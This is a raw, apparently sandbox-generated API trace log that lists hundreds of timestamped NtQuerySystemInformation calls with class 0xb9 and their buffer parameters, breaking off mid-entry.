[0273.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc00, Length=0x38, ResultLength=0x0) [0273.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc00, Length=0x38, ResultLength=0x0) [0273.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9a0, Length=0x20, ResultLength=0x0) [0273.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x20, ResultLength=0x0) [0273.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x20, ResultLength=0x0) [0273.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x20, ResultLength=0x0) [0273.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb70, Length=0x20, ResultLength=0x0) [0273.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc00, Length=0x38, ResultLength=0x0) [0273.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca90, Length=0x20, ResultLength=0x0) [0273.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x20, ResultLength=0x0) [0273.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x20, ResultLength=0x0) [0273.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x20, ResultLength=0x0) [0273.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc00, Length=0x38, ResultLength=0x0) [0273.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca90, Length=0x20, ResultLength=0x0) [0273.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x20, ResultLength=0x0) [0273.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x20, ResultLength=0x0) [0273.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x20, ResultLength=0x0) [0273.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc00, Length=0x38, ResultLength=0x0) [0273.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca90, Length=0x20, ResultLength=0x0) [0273.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca20, Length=0x20, ResultLength=0x0) [0273.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca20, Length=0x20, ResultLength=0x0) [0273.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd28, Length=0x58, ResultLength=0x0) [0273.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbf0, Length=0x58, ResultLength=0x0) [0273.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb10, Length=0x38, ResultLength=0x0) [0273.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x28, ResultLength=0x0) [0273.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x28, ResultLength=0x0) [0273.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x28, ResultLength=0x0) [0273.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x28, ResultLength=0x0) [0273.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9b0, Length=0x28, ResultLength=0x0) [0273.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb10, Length=0x38, ResultLength=0x0) [0273.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x28, ResultLength=0x0) [0273.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x28, ResultLength=0x0) [0273.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb10, Length=0x38, ResultLength=0x0) [0273.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc990, Length=0x20, ResultLength=0x0) [0273.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0273.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0273.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0273.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb10, Length=0x38, ResultLength=0x0) [0273.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc990, Length=0x20, ResultLength=0x0) [0273.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x20, ResultLength=0x0) [0273.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x20, ResultLength=0x0) [0273.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbf0, Length=0x58, ResultLength=0x0) [0273.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb10, Length=0x38, ResultLength=0x0) [0273.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x28, ResultLength=0x0) [0273.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x28, ResultLength=0x0) [0273.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x28, ResultLength=0x0) [0273.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x28, ResultLength=0x0) [0273.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9b0, Length=0x28, ResultLength=0x0) [0273.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb10, Length=0x38, ResultLength=0x0) [0273.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x28, ResultLength=0x0) [0273.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x28, ResultLength=0x0) [0273.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8d0, Length=0x20, ResultLength=0x0) [0273.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc850, Length=0x20, ResultLength=0x0) [0273.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc850, Length=0x20, ResultLength=0x0) [0273.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc850, Length=0x20, ResultLength=0x0) [0273.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb10, Length=0x38, ResultLength=0x0) [0273.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb10, Length=0x38, ResultLength=0x0) [0273.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc990, Length=0x20, ResultLength=0x0) [0273.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x20, ResultLength=0x0) [0273.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x20, ResultLength=0x0) [0273.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbf0, Length=0x58, ResultLength=0x0) [0273.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb10, Length=0x38, ResultLength=0x0) [0273.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x28, ResultLength=0x0) [0273.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x28, ResultLength=0x0) [0273.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x28, ResultLength=0x0) [0273.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x28, ResultLength=0x0) [0273.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9b0, Length=0x28, ResultLength=0x0) [0273.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb10, Length=0x38, ResultLength=0x0) [0273.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x28, ResultLength=0x0) [0273.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x28, ResultLength=0x0) [0273.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb10, Length=0x38, ResultLength=0x0) [0273.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc990, Length=0x20, ResultLength=0x0) [0273.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0273.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0273.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0273.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb10, Length=0x38, ResultLength=0x0) [0273.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc990, Length=0x20, ResultLength=0x0) [0273.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x20, ResultLength=0x0) [0273.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x20, ResultLength=0x0) [0273.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbf0, Length=0x58, ResultLength=0x0) [0273.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x38, ResultLength=0x0) [0273.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x28, ResultLength=0x0) [0273.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x28, ResultLength=0x0) [0273.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x28, ResultLength=0x0) [0273.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x28, ResultLength=0x0) [0273.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc980, Length=0x28, ResultLength=0x0) [0273.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x38, ResultLength=0x0) [0273.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x38, ResultLength=0x0) [0273.409] NtQuerySystemInformation 